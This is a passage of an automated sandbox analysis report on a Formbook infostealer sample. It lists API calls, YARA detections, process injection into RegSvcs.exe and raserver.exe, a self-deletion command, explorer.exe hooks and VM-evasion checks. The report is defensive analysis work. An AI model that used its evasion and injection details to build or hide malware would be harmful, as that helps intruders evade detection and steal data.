            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D999D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D995F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99560 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D997A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19D60 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E90 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E10 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19F40 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E19E8A NtClose,
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112E266
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01126578
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01126569
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0112C7A8
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_01129748
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05004CC0
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05007E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05008E28
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_05009B80
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_0500DAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DAD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E7CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01711002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017228EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017220A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171DBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017222AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01650D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017225DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01676E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171D616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01722EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E228EC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B090
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E220A8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D820A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1D466
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6841F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11002
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E225DD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21D55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5F900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22D07
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D50D20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E222AE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D76E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E21FF1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1DBD2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8EBB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E22B28
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1D160
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E09E3C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E02FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1DF72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0165B150 appears 35 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04D5B150 appears 35 times
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilename vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.240626128.0000000000622000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.245690399.0000000005C00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vOKMFxiCYt.exe
            Source: vOKMFxiCYt.exeBinary or memory string: OriginalFilenameLqei.exe4 vs vOKMFxiCYt.exe
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/4
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vOKMFxiCYt.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_01
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
            Source: vOKMFxiCYt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: vOKMFxiCYt.exeReversingLabs: Detection: 35%
            Source: unknownProcess created: C:\Users\user\Desktop\vOKMFxiCYt.exe 'C:\Users\user\Desktop\vOKMFxiCYt.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: vOKMFxiCYt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: vOKMFxiCYt.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, raserver.exe, 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000004.00000002.506744729.000000000525F000.00000004.00000001.sdmp
            Source: Binary string: RAServer.pdbGCTL source: RegSvcs.exe, 00000001.00000002.272464370.0000000001B70000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeCode function: 0_2_006248FC push edx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00417A32 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CEB5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF6C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF02 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF0B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DAD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E17A32 push es; iretd
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CEB5 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF6C push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF02 push eax; ret
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_00E1CF0B push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE5
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vOKMFxiCYt.exe PID: 2764, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000E098E4 second address: 0000000000E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000E09B5E second address: 0000000000E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 4120Thread sleep time: -50971s >= -30000s
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe TID: 5968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6520Thread sleep count: 40 > 30
            Source: C:\Windows\explorer.exe TID: 6520Thread sleep time: -80000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2432Thread sleep time: -80000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000002.00000000.256631003.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
